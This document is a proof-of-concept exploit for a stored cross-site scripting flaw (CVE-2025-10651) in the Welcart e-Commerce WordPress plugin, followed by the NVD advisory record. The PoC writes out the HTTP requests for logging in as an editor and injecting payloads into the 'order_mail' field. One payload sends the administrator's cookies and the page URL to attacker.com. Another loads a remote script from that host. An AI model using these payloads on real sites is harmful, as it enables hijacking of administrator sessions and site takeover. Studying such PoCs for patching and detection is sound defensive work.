CVE-2025-10651

<!-- CVE-2025-10651 - Welcart e-Commerce Stored XSS PoC Vulnerability: Stored XSS via 'order_mail' setting field Required Role: Editor or above Target: WordPress admin (when viewing E-mail Setting page) --> <!-- Step 1: Authenticate as Editor-level user --> POST /wp-login.php HTTP/1.1 Host: target-wordpress-site.com Content-Type: application/x-www-form-urlencoded log=editor_user&pwd=editor_password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1 <!-- Step 2: Navigate to General Setting page and inject malicious payload into 'order_mail' field --> POST /wp-admin/admin.php?page=usces_itemedit&usces_option=mail HTTP/1.1 Host: target-wordpress-site.com Content-Type: application/x-www-form-urlencoded Cookie: wordpress_logged_in_xxx=xxx <!-- Malicious payload injected into order_mail field --> <!-- The following script will be stored in database and executed when admin views E-mail Setting page --> order_mail=<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie)+'&url='+encodeURIComponent(document.location.href))</script>&usces_option_update=update <!-- Alternative payload using img onerror for environments blocking script tags --> order_mail=<img src=x onerror="var s=document.createElement('script');s.src='https://attacker.com/xss.js';document.body.appendChild(s);"> <!-- Step 3: When admin accesses E-mail Setting page, the stored XSS fires --> GET /wp-admin/admin.php?page=usces_itemedit&usces_option=mail HTTP/1.1 Host: target-wordpress-site.com Cookie: wordpress_logged_in_admin=xxx <!-- The malicious script executes in admin's browser context, stealing cookies or performing privileged actions -->

{"cve": {"id": "CVE-2025-10651", "sourceIdentifier": "[email protected]", "published": "2025-10-22T06:15:31.210", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Welcart e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'order_mail' setting in versions up to, and including, 2.11.22. This is due to insufficient sanitization on the order_mail field and a lack of escaping on output. This makes it possible for authenticated attackers, with Editor-level permissions and above, to inject arbitrary web scripts via the General Setting page that will execute when an administrator accesses the E-mail Setting page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3374769/usc-e-shop", "source": "[email protected]"}, {"url": "https://www.welcart.com/archives/26052.html", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ff1f81e8-64ed-4330-9c76-1a8d2e2d307d?source=cve", "source": "[email protected]"}]}}